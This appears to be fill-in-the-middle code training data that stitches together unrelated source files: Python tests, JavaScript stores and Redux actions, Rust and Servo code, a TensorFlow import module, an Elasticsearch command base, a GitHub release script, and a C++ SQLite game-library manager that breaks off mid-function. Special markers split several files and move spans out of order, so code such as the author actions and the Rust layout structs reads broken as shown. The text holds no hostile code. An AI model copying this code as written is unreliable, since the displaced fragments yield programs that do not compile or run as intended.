@unittest.skipIf(sys.platform == 'darwin', 'irrelevant test on Mac OS X')
def test_normalize(self):
files = set(f for f in self.files if isinstance(f, unicode))
others = set()
for nf in set(['NFC', 'NFD', 'NFKC', 'NFKD']):
others |= set(normalize(nf, file) for file in files)
others -= files
for name in others:
self._apply_failure(open, name, IOError)
self._apply_failure(os.stat, name, OSError)
self._apply_failure(os.chdir, name, OSError)
self._apply_failure(os.rmdir, name, OSError)
self._apply_failure(os.remove, name, OSError)
            # listdir may append a wildcard to the filename, so don't check
self._apply_failure(os.listdir, name, OSError, False)
# Skip the test on darwin, because darwin uses a normalization different
# than Python NFD normalization: filenames are different even if we use
# Python NFD normalization.
@unittest.skipIf(sys.platform == 'darwin', 'irrelevant test on Mac OS X')
def test_listdir(self):
sf0 = set(self.files)
f1 = os.listdir(test_support.TESTFN)
f2 = os.listdir(unicode(test_support.TESTFN,
sys.getfilesystemencoding()))
sf2 = set(os.path.join(unicode(test_support.TESTFN), f) for f in f2)
self.assertEqual(sf0, sf2)
self.assertEqual(len(f1), len(f2))
def test_rename(self):
for name in self.files:
os.rename(name, "tmp")
os.rename("tmp", name)
def test_directory(self):
dirname = os.path.join(test_support.TESTFN,
u'Gr\xfc\xdf-\u66e8\u66e9\u66eb')
filename = u'\xdf-\u66e8\u66e9\u66eb'
oldwd = os.getcwd()
os.mkdir(dirname)
os.chdir(dirname)
try:
with open(filename, 'w') as f:
f.write((filename + '\n').encode("utf-8"))
os.access(filename,os.R_OK)
os.remove(filename)
finally:
os.chdir(oldwd)
os.rmdir(dirname)
class UnicodeNFCFileTests(UnicodeFileTests):
normal_form = 'NFC'
class UnicodeNFDFileTests(UnicodeFileTests):
normal_form = 'NFD'
class UnicodeNFKCFileTests(UnicodeFileTests):
normal_form = 'NFKC'
class UnicodeNFKDFileTests(UnicodeFileTests):
normal_form = 'NFKD'
def test_main():
try:
test_support.run_unittest(
UnicodeFileTests,
UnicodeNFCFileTests,
UnicodeNFDFileTests,
UnicodeNFKCFileTests,
UnicodeNFKDFileTests,
)
finally:
deltree(test_support.TESTFN)
if __name__ == "__main__":
test_main()<|fim▁end|>
| |
<|file_name|>user-uuid-store.js<|end_file_name|><|fim▁begin|>/*!
* Copyright (c) 2015-2017 Cisco Systems, Inc. See LICENSE file.
*/
import {patterns} from '@ciscospark/common';
const usersByEmail = new WeakMap();
const usersById = new WeakMap();
<|fim▁hole|>/**
* @class
*/
export default class UserUUIDStore {
/**
* @constructs {UserUUIDStore}
*/
constructor() {
usersByEmail.set(this, new Map());
usersById.set(this, new Map());
}
/**
* Adds a user object to the store
* @param {Object} user
* @param {string} user.id
* @param {string} user.emailAddress
* @returns {Promise}
*/
add(user) {
if (!user.id) {
return Promise.reject(new Error('`user.id` is required'));
}
if (!user.emailAddress) {
return Promise.reject(new Error('`user.emailAddress` is required'));
}
if (!patterns.uuid.test(user.id)) {
return Promise.reject(new Error('`user.id` does not appear to be a uuid'));
}
if (!patterns.email.test(user.emailAddress)) {
return Promise.reject(new Error('`user.emailAddress` does not appear to be an email address'));
}
const p1 = this.getById(user.id)
.then((u) => usersById.get(this).set(user.id, Object.assign({}, u, user)))
.catch(() => usersById.get(this).set(user.id, Object.assign({}, user)));
const p2 = this.getByEmail(user.emailAddress)
.then((u) => usersByEmail.get(this).set(user.emailAddress, Object.assign({}, u, user)))
.catch(() => usersByEmail.get(this).set(user.emailAddress, Object.assign({}, user)));
return Promise.all([p1, p2]);
}
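
  // Illustrative usage (not part of the original file; the uuid and email
  // address are made up):
  //
  //   const store = new UserUUIDStore();
  //   store.add({id: '11111111-2222-3333-4444-555555555555',
  //              emailAddress: 'user@example.com'})
  //     .then(() => store.get('user@example.com'))
  //     .then((user) => console.log(user.id));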
/**
   * Retrieves the specified user object from the store
* @param {string} id
* @returns {Promise<Object>}
*/
get(id) {
if (patterns.uuid.test(id)) {
return this.getById(id);
}
if (patterns.email.test(id)) {
return this.getByEmail(id);
}
return Promise.reject(new Error('`id` does not appear to be a valid user identifier'));
}
/**
* Retrieves the specified user object by id from the store
   * @param {string} id
* @returns {Promise<Object>}
*/
getById(id) {
const ret = usersById.get(this).get(id);
if (ret) {
return Promise.resolve(ret);
}
return Promise.reject(new Error('No user found by specified id'));
}
/**
   * Retrieves the specified user object by email address from the store
   * @param {string} email
* @returns {Promise<Object>}
*/
getByEmail(email) {
const ret = usersByEmail.get(this).get(email);
if (ret) {
return Promise.resolve(ret);
}
return Promise.reject(new Error('No user found by specified email address'));
}
}<|fim▁end|>
| |
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// Copyright (c) 2016 Tibor Benke <[email protected]>
//
// Licensed under the Apache License, Version 2.0
// <LICENSE-APACHE or http://www.apache.org/licenses/LICENSE-2.0> or the MIT
// license <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. All files in the project carrying such notice may not be copied,
// modified, or distributed except according to those terms.
use uuid::Uuid;
use config::action::ActionType;
use conditions::Conditions;
mod deser;
pub mod action;
pub struct ContextConfig {
pub name: Option<String>,
pub uuid: Uuid,
pub conditions: Conditions,
pub context_id: Option<Vec<String>>,
pub actions: Vec<ActionType>,
pub patterns: Vec<String>
}
pub struct ContextConfigBuilder {
name: Option<String>,
uuid: Uuid,
conditions: Conditions,
context_id: Option<Vec<String>>,
actions: Vec<ActionType>,
patterns: Vec<String>
}
impl ContextConfigBuilder {
pub fn new(uuid: Uuid, conditions: Conditions) -> ContextConfigBuilder {
ContextConfigBuilder {
name: None,
uuid: uuid,
conditions: conditions,
context_id: None,
actions: Vec::new(),
patterns: Vec::new()
}
}
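
    // Illustrative usage (not part of the original source): chain the
    // setters and finish with build().
    //
    //     let config = ContextConfigBuilder::new(uuid, conditions)
    //         .name("example".to_string())
    //         .actions(actions)
    //         .build();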
pub fn context_id(mut self, context_id: Option<Vec<String>>) -> ContextConfigBuilder {
self.context_id = context_id;
self
}
pub fn actions(mut self, actions: Vec<ActionType>) -> ContextConfigBuilder {
self.actions = actions;
self
}
pub fn name(mut self, name: String) -> ContextConfigBuilder {
self.name = Some(name);
self<|fim▁hole|> pub fn patterns(mut self, patterns: Vec<String>) -> ContextConfigBuilder {
self.patterns = patterns;
self
}
pub fn build(self) -> ContextConfig {
ContextConfig {
name: self.name,
uuid: self.uuid,
conditions: self.conditions,
context_id: self.context_id,
actions: self.actions,
patterns: self.patterns
}
}
}<|fim▁end|>
|
}
|
<|file_name|>feature_column_lib.py<|end_file_name|><|fim▁begin|># Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,<|fim▁hole|># WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""FeatureColumns: tools for ingesting and representing features."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,wildcard-import,g-bad-import-order
from tensorflow.python.feature_column.feature_column import *
from tensorflow.python.feature_column.feature_column_v2 import *
from tensorflow.python.feature_column.sequence_feature_column import *
from tensorflow.python.feature_column.serialization import *
# We import dense_features_v2 first so that the V1 DenseFeatures is the default
# if users directly import feature_column_lib.
from tensorflow.python.keras.feature_column.dense_features_v2 import *
from tensorflow.python.keras.feature_column.dense_features import *
from tensorflow.python.keras.feature_column.sequence_feature_column import *
# pylint: enable=unused-import,line-too-long<|fim▁end|>
| |
<|file_name|>authorActions.js<|end_file_name|><|fim▁begin|>import authorAPI from '../api/mock/mockAuthorAPI';
import * as types from './actionTypes';
import { beginAjaxCall } from './ajaxStatusActions';
const loadAuthorSuccess = (authors) => {<|fim▁hole|>
  return { type: types.LOAD_AUTHOR_SUCCESS, authors };
const loadAuthors = () => {
return (dispatch) => {
dispatch(beginAjaxCall());
return authorAPI.getAllAuthors().then(authors => {
dispatch(loadAuthorSuccess(authors));
}).catch(error => {
throw(error);
});
};
};
export {
loadAuthors,
loadAuthorSuccess
};<|fim▁end|>
| |
<|file_name|>stack-probes.rs<|end_file_name|><|fim▁begin|>// ignore-arm
// ignore-aarch64
// ignore-mips
// ignore-mips64
// ignore-powerpc
// ignore-powerpc64
// ignore-powerpc64le
// ignore-riscv64
// ignore-s390x
// ignore-sparc
// ignore-sparc64
// ignore-wasm
// ignore-emscripten
// ignore-windows
// compile-flags: -C no-prepopulate-passes
#![crate_type = "lib"]<|fim▁hole|>pub fn foo() {
// CHECK: @foo() unnamed_addr #0
}<|fim▁end|>
|
#[no_mangle]
|
<|file_name|>test_mincu_spider.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import os
import unittest
from manolo_scraper.spiders.mincu import MincuSpider
from utils import fake_response_from_file
class TestMincuSpider(unittest.TestCase):
def setUp(self):
self.spider = MincuSpider()
def test_parse_item(self):
filename = os.path.join('data/mincu', '18-08-2015.html')
items = self.spider.parse(fake_response_from_file(filename, meta={'date': u'18/08/2015'}))
item = next(items)
self.assertEqual(item.get('full_name'), u'INGRID BARRIONUEVO ECHEGARAY')
self.assertEqual(item.get('time_start'), u'16:40')
self.assertEqual(item.get('institution'), u'mincu')
self.assertEqual(item.get('id_document'), u'DNI')
self.assertEqual(item.get('id_number'), u'10085172')
self.assertEqual(item.get('entity'), u'PARTICULAR')
self.assertEqual(item.get('reason'), u'REUNIÓN DE TRABAJO')
self.assertEqual(item.get('host_name'), u'JOIZ ELIZABETH DOBLADILLO ORTIZ')
self.assertEqual(item.get('title'), u'[SERVICIOS DE UN ASISTENTE EN COMUNICACIONES]')<|fim▁hole|> self.assertEqual(item.get('time_end'), u'16:53')
self.assertEqual(item.get('date'), u'2015-08-18')
number_of_items = 1 + sum(1 for x in items)
self.assertEqual(number_of_items, 15)<|fim▁end|>
|
self.assertEqual(item.get('office'), u'QHAPAQ ÑAN')
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>"""Base command for search-related management commands."""
from __future__ import annotations
import argparse
import builtins
import logging
from typing import Any, Optional, Union
from django.core.management.base import BaseCommand
from elasticsearch.exceptions import TransportError
CommandReturnType = Optional[Union[list, dict]]
logger = logging.getLogger(__name__)
class BaseSearchCommand(BaseCommand):
"""Base class for commands that interact with the search index."""
description = "Base search command."
<|fim▁hole|> """Return True if the user confirms the action."""
msg = "Are you sure you wish to continue? [y/N] "
return builtins.input(msg).lower().startswith("y")
def add_arguments(self, parser: argparse.ArgumentParser) -> None:
"""Add default base options of --noinput and indexes."""
parser.add_argument(
"-f",
"--noinput",
action="store_false",
dest="interactive",
default=True,
help="Do no display user prompts - may affect data.",
)
parser.add_argument(
"indexes", nargs="*", help="Names of indexes on which to run the command."
)
def do_index_command(self, index: str, **options: Any) -> CommandReturnType:
"""Run a command against a named index."""
raise NotImplementedError()
def handle(self, *args: Any, **options: Any) -> None:
"""Run do_index_command on each specified index and log the output."""
for index in options.pop("indexes"):
try:
data = self.do_index_command(index, **options)
except TransportError as ex:
logger.warning("ElasticSearch threw an error: %s", ex)
data = {"index": index, "status": ex.status_code, "reason": ex.error}
except FileNotFoundError as ex:
logger.warning("Mapping file not found: %s", ex)
data = {
"index": index,
"status": "N/A",
"reason": "Mapping file not found",
}
except Exception as ex: # noqa: B902
logger.warning("Error running command: %s", ex)
data = {
"index": index,
"status": "N/A",
"reason": str(ex),
}
finally:
logger.info(data)<|fim▁end|>
|
def _confirm_action(self) -> bool:
|
<|file_name|>rpc.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use app_units::Au;
use euclid::{Point2D, Rect};
use script_traits::UntrustedNodeAddress;
use servo_arc::Arc;
use style::properties::ComputedValues;
use style::properties::longhands::overflow_x;
use webrender_api::ExternalScrollId;
/// Synchronous messages that script can send to layout.
///
/// In general, you should use messages to talk to Layout. Use the RPC interface
/// if and only if the work is
///
/// 1) read-only with respect to LayoutThreadData,
/// 2) small,
/// 3) and really needs to be fast.
pub trait LayoutRPC {
/// Requests the dimensions of the content box, as in the `getBoundingClientRect()` call.
fn content_box(&self) -> ContentBoxResponse;
/// Requests the dimensions of all the content boxes, as in the `getClientRects()` call.
fn content_boxes(&self) -> ContentBoxesResponse;
/// Requests the geometry of this node. Used by APIs such as `clientTop`.
fn node_geometry(&self) -> NodeGeometryResponse;
/// Requests the scroll geometry of this node. Used by APIs such as `scrollTop`.
fn node_scroll_area(&self) -> NodeGeometryResponse;
/// Requests the scroll id of this node. Used by APIs such as `scrollTop`
fn node_scroll_id(&self) -> NodeScrollIdResponse;
/// Query layout for the resolved value of a given CSS property
fn resolved_style(&self) -> ResolvedStyleResponse;
fn offset_parent(&self) -> OffsetParentResponse;
/// Requests the styles for an element. Contains a `None` value if the element is in a `display:
/// none` subtree.
fn style(&self) -> StyleResponse;
fn text_index(&self) -> TextIndexResponse;
/// Requests the list of nodes from the given point.
fn nodes_from_point_response(&self) -> Vec<UntrustedNodeAddress>;
/// Query layout to get the inner text for a given element.
fn element_inner_text(&self) -> String;
}
pub struct ContentBoxResponse(pub Option<Rect<Au>>);
pub struct ContentBoxesResponse(pub Vec<Rect<Au>>);
pub struct NodeGeometryResponse {
pub client_rect: Rect<i32>,
}
pub struct NodeOverflowResponse(pub Option<Point2D<overflow_x::computed_value::T>>);
pub struct NodeScrollIdResponse(pub ExternalScrollId);
pub struct ResolvedStyleResponse(pub String);
#[derive(Clone)]
pub struct OffsetParentResponse {
pub node_address: Option<UntrustedNodeAddress>,
pub rect: Rect<Au>,<|fim▁hole|> pub fn empty() -> OffsetParentResponse {
OffsetParentResponse {
node_address: None,
rect: Rect::zero(),
}
}
}
#[derive(Clone)]
pub struct StyleResponse(pub Option<Arc<ComputedValues>>);
#[derive(Clone)]
pub struct TextIndexResponse(pub Option<usize>);<|fim▁end|>
|
}
impl OffsetParentResponse {
|
<|file_name|>create_general_release.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# (c) Copyright IBM Corp. 2021
# (c) Copyright Instana Inc. 2020
# Script to make a new python-sensor release on Github
# Requires the Github CLI to be installed and configured: https://github.com/cli/cli
import os
import sys
import distutils.spawn
from subprocess import check_output
if len(sys.argv) != 2:
raise ValueError('Please specify the version to release. e.g. "1.27.1"')
if sys.argv[1] in ['-h', '--help']:
filename = os.path.basename(__file__)
print("Usage: %s <version number>" % filename)
    print("Example: %s 1.27.1" % filename)
print("")
print("This will create a release on Github such as:")
    print("https://github.com/instana/python-sensor/releases/tag/v1.27.1")
    sys.exit(0)
# Check requirements first
for cmd in ["gh"]:
if distutils.spawn.find_executable(cmd) is None:
print("Can't find required tool: %s" % cmd)
sys.exit(1)
version = sys.argv[1]
semantic_version = 'v' + version
title = version
body = """
This release includes the following fixes & improvements:
*
Available on PyPI:
https://pypi.python.org/pypi/instana/%s
""" % version
<|fim▁hole|> "-R", "instana/python-sensor",
"-t", semantic_version,
"-n", body])
print("If there weren't any failures, the draft release is available at:")
print(response.strip().decode())<|fim▁end|>
|
response = check_output(["gh", "release", "create", semantic_version,
"-d", # draft
|
<|file_name|>dbmanager.cpp<|end_file_name|><|fim▁begin|>#include "dbmanager.h"
//=============================================================================================================================
//=================================================CONSTRUCTOR=================================================================
//=============================================================================================================================
DbManager::DbManager(const QString& db_name)
/*Provided the database path db_name, this constructor opens the database and
creates the file if it doesn't exist, with the following schema:
    - Table game containing games
    - Table platform containing platforms
    - Table emulator containing emulators
    - Table extsoft containing external software
*/
{
QSqlDatabase db = QSqlDatabase::database();
if(db.connectionName()=="")
{
initDb(db_name);
}
else
{
m_db = db;
        qDebug(qUtf8Printable("Db: reusing existing connection"));
}
}
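
// Illustrative usage (not from the original project):
//
//     DbManager db("collection.db");
//     if (db.checkAddGamePossible(42)) {
//         db.addGameEntry(42, "Some Game", "Some Platform", -1);
//     }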
void DbManager::initDb(const QString& db_name)
{
m_db = QSqlDatabase::addDatabase("QSQLITE");
m_db.setDatabaseName(db_name);
m_db.open();
m_db_name = db_name;
QSqlQuery query1;
query1.exec("create table if not exists game ("
"id integer primary key, "
"game_title varchar(1000), "
"platform varchar(1000), "
"emulator_name varchar(1000), "
"path varchar(1000), "
"release_date varchar(100), "
"image BLOB, "
"game_info text, "
"time_played integer, "
"last_played text, "
"game_favorited integer, "
"state text, "
"game_steam integer,"
"steamid integer,"
"opened_counter integer)");
QSqlQuery query2;
query2.exec("create table if not exists platform ("
"platform varchar(1000) primary key, "
"emulator_name varchar(1000), "
"image BLOB, "
"platform_info text, "
"time_played integer, "
"last_played text,"
"game_counter integer,"
"opened_counter integer)");
QSqlQuery query3;
query3.exec("create table if not exists emulator ("
"emulator_name varchar(1000) primary key, "
"image BLOB, "
"path varchar(1000), "
"emulator_info text, "
"time_played integer, "
"last_played text,"
"opened_counter integer)");
QSqlQuery query4;
query4.exec("create table if not exists extsoft ("
"software_name varchar(1000) primary key,"
"image BLOB,"
"path varchar(1000),"
"supported_extsoft integer,"
"multi_instance integer,"
"opened_counter integer,"
"games_off_list text,"
"games_whitelist text,"
"platforms_on_list text)");
}
void DbManager::close()
{
m_db.close();
}
void DbManager::setDatabaseName(const QString& path)
{
m_db.setDatabaseName(path);
}
bool DbManager::checkAddGamePossible(int id)
{
bool success = false;
QSqlQuery query;
query.prepare("SELECT EXISTS(SELECT 1 FROM game WHERE id=:id LIMIT 1);");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
success = query.value(0).toBool();
success = !success;
}
}
else
{
qDebug() << "checkAddGamePossible error: " << query.lastError().text();
}
return success;
}
bool DbManager::checkAddExternalSoftwarePossible(QString externalSoftwareName)
{
bool success = false;
QSqlQuery query;
query.prepare("SELECT EXISTS(SELECT 1 FROM extsoft WHERE software_name=:software_name LIMIT 1);");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while (query.next())
{
success = query.value(0).toBool();
success = !success;
}
}
else
{
qDebug() << "checkAddExternalSoftwareEntry error: " << query.lastError().text();
}
return success;
}
//=============================================================================================================================
//=================================================GAME TABLE OPERATIONS=======================================================
//=============================================================================================================================
bool DbManager::addGameEntry(int id, QString gameTitle, QString platform, int steamid)
/*Provided a game, this function adds it to the game table.
*/
{
bool success = false;
QSqlQuery query;
query.prepare("INSERT INTO game (id,game_title,platform,time_played,steamid,opened_counter,state,last_played) VALUES(:id,:game_title,:platform,:time_played,:steamid,:opened_counter,:state,:last_played)");
query.bindValue(":id",id);
query.bindValue(":game_title",gameTitle);
query.bindValue(":platform",platform);
query.bindValue(":time_played",0);
query.bindValue(":steamid",steamid);
query.bindValue(":opened_counter",0);
query.bindValue(":state","");
query.bindValue(":last_played","");
if(query.exec())
{
success = true;
}
else
{
qDebug() << "addGameEntry error: " << query.lastError().text();
}
return success;
}
bool DbManager::deleteGameEntry(int id)
/*Provided a game id, this function removes it from the game table(and therefore from the database).
*/
{
bool success = false;
QSqlQuery query;
query.prepare("DELETE FROM game WHERE id = :id;");
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "deleteGameEntry error: " << query.lastError().text();
}
return success;
}
//=============================================================================================================================
//=================================================GET OPERATIONS==============================================================
//=============================================================================================================================
QList<int> DbManager::getAllGames()
{
QList<int> AllGames;
QSqlQuery query;
query.prepare("SELECT id FROM game;");
if(query.exec())
{
while (query.next())
{
AllGames.append(query.value(0).toInt());
}
}
else
{
qDebug() << "getAllGames error: " << query.lastError().text();
}
return AllGames;
}
int DbManager::getGameId(QString gameTitle, QString platform)
/*Provided a game_title and platform, this function returns its id.
*/
{
int id(-1);
QSqlQuery query;
query.prepare("SELECT id FROM game WHERE game_title=:game_title AND platform=:platform;");
query.bindValue(":game_title",gameTitle);
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
id = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(id)));
}
}
else
{
qDebug() << "getGameId error: " << query.lastError().text();
}
return id;
}
int DbManager::getGameSteamId(QString gameTitle, QString platform)
{
/*Provided a game_title and platform, this function returns its id.
*/
int steamid(-1);
QSqlQuery query;
query.prepare("SELECT steamid FROM game WHERE game_title=:game_title AND platform=:platform;");
query.bindValue(":game_title",gameTitle);
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
steamid = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(steamid)));
}
}
else
{
qDebug() << "getGameSteamId error: " << query.lastError().text();
}
return steamid;
}
QString DbManager::getGameTitle(int id)
/*Provided a game id, this function returns its game_title.
*/
{
QString gameTitle("");
QSqlQuery query;
query.prepare("SELECT game_title FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
gameTitle = query.value(0).toString();
qDebug(qUtf8Printable(gameTitle));
}
}
else
{
qDebug() << "getGameTitle error: " << query.lastError().text();
}
return gameTitle;
}
QString DbManager::getGamePlatform(int id)
/*Provided a game id, this function returns its platform.
*/
{
QString platform("");
QSqlQuery query;
query.prepare("SELECT platform FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
platform = query.value(0).toString();
qDebug(qUtf8Printable(platform));
}
}
else
{
qDebug() << "getGamePlatform error: " << query.lastError().text();
}
return platform;
}
QString DbManager::getGamePath(int id)
/*Provided a game id, this function returns its path.
*/
{
QString path("");
QSqlQuery query;
query.prepare("SELECT path FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
path = query.value(0).toString();
qDebug(qUtf8Printable(path));
}
}
else
{
qDebug() << "getGamePath error: " << query.lastError().text();
}
return path;
}
QByteArray DbManager::getGameImage(int id)
/*Provided a game id, this function returns its image byte array.
*/
{
QByteArray gameImage;
QSqlQuery query;
query.prepare("SELECT image FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
gameImage = query.value(0).toByteArray();
}
}
else
{
qDebug() << "getGameImage error: " << query.lastError().text();
}
return gameImage;
}
QString DbManager::getGameInfo(int id)
/*Provided a game id, this function returns its game_info.
*/
{
QString game_info("");
QSqlQuery query;
query.prepare("SELECT game_info FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
game_info = query.value(0).toString();
qDebug(qUtf8Printable(game_info));
}
}
else
{
qDebug() << "getGameInfo error: " << query.lastError().text();
}
return game_info;
}
QString DbManager::getGameEmulator(int id)
/*Provided a game id, this function returns its emulator_name.
*/
{
QString emulatorName("");
QSqlQuery query;
query.prepare("SELECT emulator_name FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
emulatorName = query.value(0).toString();
qDebug(qUtf8Printable(emulatorName));
}
}
else
{
qDebug() << "getGameEmulator error: " << query.lastError().text();
}
return emulatorName;
}
QString DbManager::getGameReleaseDate(int id)
/*Provided a game id, this function returns its release_date.
*/
{
QString releaseDate("");
QSqlQuery query;
query.prepare("SELECT release_date FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
releaseDate = query.value(0).toString();
qDebug(qUtf8Printable(releaseDate));
}
}
else
{
qDebug() << "getGameReleaseDate error: " << query.lastError().text();
}
return releaseDate;
}
int DbManager::getGameTimePlayed(int id)
/*Provided a game id, this function returns its time_played.
*/
{
int time = -1;
QSqlQuery query;
query.prepare("SELECT time_played FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
time = query.value(0).toInt();
qDebug(qUtf8Printable("time played on database : "+QString::number(time)));
}
}
else
{
qDebug() << "getGameTimePlayed error: " << query.lastError().text();
}
return time;
}
QString DbManager::getGameLastPlayed(int id)
/*Provided a game id, this function returns its last_played.
*/
{
QString lastPlayed("Never Played");
QSqlQuery query;
query.prepare("SELECT last_played FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
lastPlayed = query.value(0).toString();
qDebug(qUtf8Printable(lastPlayed));
}
}
else
{
qDebug() << "getGameLastPlayed error: " << query.lastError().text();
}
qDebug(qUtf8Printable("debug20"));
return lastPlayed;
}
int DbManager::getGameOpenedCounter(int id)
{
int openedCounter=-1;
QSqlQuery query;
query.prepare("SELECT opened_counter FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
openedCounter = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(openedCounter)));
}
}
else
{
qDebug() << "getGameOpenedCounter error: " << query.lastError().text();
}
return openedCounter;
}
QString DbManager::getGameState(int id)
{
QString state("");
QSqlQuery query;
query.prepare("SELECT state FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
state = query.value(0).toString();
}
}
else
{
qDebug() << "getGameState error: " << query.lastError().text();
}
return state;
}
QDateTime DbManager::stringToDate(QString dateString)
/*Converts a "yyyy-MM-dd hh:mm:ss" string (the format produced by SQLite's
DATETIME('now','localtime')) into a QDateTime. Returns an invalid QDateTime
for empty or "Never Played" input, or if the string does not parse.
*/
{
    if (dateString=="" || dateString=="Never Played")
    {
        return QDateTime();
    }
    return QDateTime::fromString(dateString, "yyyy-MM-dd hh:mm:ss");
}
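//A minimal usage sketch (the dbManager instance and game id are hypothetical):
//
//    QDateTime last = dbManager.stringToDate(dbManager.getGameLastPlayed(42));
//    if (last.isValid())
//    {
//        qDebug() << "days since last played:" << last.daysTo(QDateTime::currentDateTime());
//    }
//
//The invalid QDateTime doubles as the "Never Played" signal, so callers should
//check isValid() before doing any date arithmetic.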
//=============================================================================================================================
//=================================================SET OPERATIONS==============================================================
//=============================================================================================================================
bool DbManager::setGameImage(int id, QByteArray imageData)
//Provided a game id and image data, this function sets the game image.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET image=:image WHERE id=:id;");
query.bindValue(":image",imageData);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGameImage error: " << query.lastError().text();
}
return success;
}
bool DbManager::setGameInfo(int id, QString gameInfo)
//Provided a game id and game_info, this function sets the game_info.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET game_info=:game_info WHERE id=:id;");
query.bindValue(":game_info",gameInfo);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGameInfo error: " << query.lastError().text();
}
return success;
}
bool DbManager::setGamePath(int id, QString gamePath)
//Provided a game id and game_path, this function sets the game_path.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET path=:path WHERE id=:id;");
query.bindValue(":path",gamePath);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGamePath error: " << query.lastError().text();
}
return success;
}
bool DbManager::setGameTimePlayed(int id, int timePlayed)
//Provided a game id and timePlayed, this function sets the time_played.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET time_played=:time_played WHERE id=:id;");
query.bindValue(":time_played",timePlayed);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGameTimePlayed error: " << query.lastError().text();
}
return success;
}
bool DbManager::updateGameLastPlayed(int id)
{
bool success = false;
QString date("");
QSqlQuery query1,query2;
query1.prepare("SELECT DATETIME('now','localtime');");
query2.prepare("UPDATE game SET last_played=:last_played WHERE id=:id;");
if(query1.exec())
{
while(query1.next())
{
date = query1.value(0).toString();
}
}
else
{
qDebug() << "updateGameLastPlayed error : " << query1.lastError().text();
return success;
}
if (date == "")
{
return success;
}
query2.bindValue(":last_played",date);
query2.bindValue(":id",id);
if(query2.exec())
{
success = true;
}
else
{
qDebug() << "updateGameLastPlayed error : " << query2.lastError().text();
}
return success;
}
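//A plausible call site for the functions above, assuming a launcher routine
//like this exists elsewhere in the project (the routine itself is
//illustrative, not taken from this file):
//
//    void onGameLaunched(DbManager &db, int gameId)
//    {
//        db.updateGameLastPlayed(gameId);
//        db.setGameOpenedCounter(gameId, db.getGameOpenedCounter(gameId) + 1);
//    }
//
//Using SQLite's DATETIME('now','localtime') keeps the timestamp format in the
//database layer, which is the "yyyy-MM-dd hh:mm:ss" shape stringToDate() parses.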
bool DbManager::setGameState(int id, QString state)
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET state=:state WHERE id=:id;");
query.bindValue(":state",state);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGameState error: " << query.lastError().text();
}
return success;
}
bool DbManager::setGameOpenedCounter(int id, int openedCounter)
//Provided a game id and openedCounter, this function sets the opened_counter.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET opened_counter=:opened_counter WHERE id=:id;");
query.bindValue(":opened_counter",openedCounter);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGameOpenedCounter error: " << query.lastError().text();
}
return success;
}
//=============================================================================================================================
//=================================================PLATFORM TABLE OPERATIONS===================================================
//=============================================================================================================================
QString DbManager::PlatformToSupportedEmulator(QString platform)
{
if (platform=="Nintendo Entertainment System (NES)")
{
return "nestopia";
}
else if (platform=="Super Nintendo (SNES)")
{
return "snes9x";
}
else if (platform=="Nintendo 64")
{
return "Project64";
}
else if (platform=="Nintendo GameCube"||platform=="Nintendo Wii")
{
return "Dolphin";
}
else if (platform=="Nintendo Wii U")
{
return "Cemu";
}
else if (platform=="Nintendo Game Boy"||platform=="Nintendo Game Boy Color"||platform =="Nintendo Game Boy Advance")
{
return "VisualBoyAdvance";
}
else if (platform=="Nintendo DS")
{
return "DeSmuME";
}
else if (platform=="Nintendo 3DS")
{
return "citra";
}
else if (platform=="Sony Playstation")
{
return "ePSXe";
}
